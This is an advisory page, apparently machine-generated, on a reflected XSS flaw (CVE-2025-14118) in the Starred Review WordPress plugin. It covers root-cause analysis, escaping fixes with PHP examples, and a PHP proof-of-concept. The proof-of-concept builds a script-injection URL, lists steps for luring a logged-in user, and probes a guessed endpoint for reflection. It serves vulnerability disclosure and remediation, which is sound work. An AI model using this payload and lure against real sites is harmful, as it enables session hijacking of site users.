Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-14118: Starred Review <= 1.4.2 – Reflected Cross-Site Scripting via PHP_SELF Variable (starred-review)

Severity Medium (CVSS 6.1)
CWE 79
Vulnerable Version 1.4.2
Patched Version
Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14118 (metadata-based):
This vulnerability is a reflected cross-site scripting (XSS) flaw in the Starred Review WordPress plugin, affecting all versions up to and including 1.4.2. The issue resides in the plugin’s insufficient neutralization of the PHP_SELF variable. Attackers can inject arbitrary JavaScript into pages, which executes in the victim’s browser context. The CVSS score of 6.1 indicates a medium-severity risk, primarily due to the required user interaction and the scope change to the victim’s browser session.

Atomic Edge research infers the root cause is improper sanitization and output escaping. The vulnerability description explicitly cites the PHP_SELF variable. PHP_SELF is an entry in PHP's $_SERVER superglobal that contains the path of the currently executing script; because it reflects the request path as the client sent it (including any trailing path segment the server passes through as PATH_INFO), its content is attacker-influenced even though it is a server variable. The plugin likely echoes this variable directly into HTML output without proper escaping. This is a classic CWE-79 pattern where user-controllable input reaches output generation functions like echo or print. The conclusion that the variable is echoed unsafely is inferred from the CWE and description, as no source code is available for confirmation.

Exploitation requires an unauthenticated attacker to craft a malicious link containing a JavaScript payload within the PHP_SELF parameter or a related variable. The victim must click this link while authenticated to WordPress. The exact endpoint is not specified, but a common pattern is a plugin administrative page that uses PHP_SELF in form actions or for constructing URLs. A likely target is a file within the plugin’s directory, such as /wp-content/plugins/starred-review/admin/settings.php. The payload would be delivered via a GET request, with the script injected into the server’s response and executed in the victim’s browser.

Remediation requires implementing proper output escaping. The plugin must stop directly outputting the PHP_SELF variable. WordPress provides esc_url() for URLs rendered in HTML (esc_url_raw() is the variant for non-display uses such as database storage or redirects) and esc_attr() for HTML attribute contexts. The fix should treat any user-influenced data, including server variables, as untrusted and escape it before it is rendered in HTML. Input sanitization is also recommended, but output escaping is the primary defense for this XSS vector.
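As an added example (not the plugin's or Atomic Edge's code), the unsafe pattern described above beside two hardened forms. It assumes the snippet runs inside WordPress, so esc_url() and admin_url() are available; the settings page slug is a placeholder, not the plugin's real slug.

```php
<?php
// Added example: reflecting PHP_SELF into a form action, unsafe vs. hardened.
// Assumes a WordPress runtime (esc_url(), admin_url() are WordPress functions).

// VULNERABLE (CWE-79): PHP_SELF is derived from the request path and is
// written into the attribute unescaped. A request path carrying a trailing
// segment such as "><script>...</script> closes the attribute and injects markup.
function starred_review_form_unsafe() {
    echo '<form method="post" action="' . $_SERVER['PHP_SELF'] . '">';
    echo '</form>';
}

// HARDENED: treat the server variable as untrusted and escape it for the
// URL-in-attribute context. esc_url() strips characters that are not valid
// in a URL (including ", <, > and whitespace) and entity-encodes & and '.
function starred_review_form_escaped() {
    echo '<form method="post" action="' . esc_url( $_SERVER['PHP_SELF'] ) . '">';
    echo '</form>';
}

// PREFERRED: do not reflect the request path at all. Build the action from a
// known admin URL, then still escape it at the output boundary.
// 'starred-review-settings' is a placeholder slug for illustration only.
function starred_review_form_fixed() {
    $action = admin_url( 'admin.php?page=starred-review-settings' );
    echo '<form method="post" action="' . esc_url( $action ) . '">';
    echo '</form>';
}
```

The third form is the one the analysis calls for: the plugin stops outputting PHP_SELF entirely, and esc_url() remains as defense in depth.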

Successful exploitation leads to arbitrary JavaScript execution within the context of the victim’s browser session on the WordPress site. This can result in session hijacking, actions performed on behalf of the user, or theft of sensitive information like cookies and nonces. The impact is limited to the capabilities of the victim user. An admin victim could enable full site compromise. The CVSS metrics confirm low confidentiality and integrity impact with no direct availability effect, but the scope change indicates the attack affects the user’s interaction with the site.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14118 - Starred Review <= 1.4.2 - Reflected Cross-Site Scripting via PHP_SELF Variable
/**
 * Proof of Concept for CVE-2025-14118.
 * This script demonstrates a reflected XSS attack via the PHP_SELF variable.
 * The exact vulnerable endpoint is inferred; common patterns point to a plugin admin page.
 * The payload triggers a JavaScript alert in the victim's browser.
 */

$target_url = 'https://victim-site.com/wp-content/plugins/starred-review/admin/settings.php';

// Malicious payload to inject. The PHP_SELF variable is often used in form 'action' attributes.
// The payload is appended directly to the request path.
$payload = '"><script>alert(document.domain)</script>';
$exploit_url = $target_url . $payload;

// Display the malicious link for social engineering.
echo "Exploit URL: " . htmlspecialchars($exploit_url) . "\n";
echo "\nInstructions:";
echo "\n1. An attacker would craft this URL with a more stealthy payload.";
echo "\n2. The attacker tricks an authenticated WordPress user into clicking the link.";
echo "\n3. The victim's browser executes the script when the plugin page loads.";
echo "\n4. This PoC uses an alert for demonstration; real attacks would exfiltrate cookies or perform actions.";

// Optional: Use cURL to fetch the page and check if the payload is reflected (unencoded).
echo "\n\n[Optional] Checking for reflection...\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
curl_close($ch);

// curl_exec() returns false on a transport error; guard before searching the body.
if ($response !== false && strpos($response, $payload) !== false) {
    echo "Payload found reflected in response (likely vulnerable).\n";
} else {
    echo "Payload not found in raw response. The endpoint may be different or patched.\n";
}
?>
